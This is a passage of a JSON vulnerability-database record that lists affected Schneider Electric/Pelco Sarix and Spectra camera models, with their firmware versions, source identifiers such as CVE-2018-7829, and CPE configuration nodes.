{
"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric spectra enhanced ptz camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6220l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6220l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:d6230l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionStartIncluding": "2.11",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:d6230l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1i_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1i:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1s_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-b1p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-b1p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ei_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ei:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1es_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1es:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1ep_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1ep:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imes19-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imes19-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime119-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime119-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime219-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime219-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
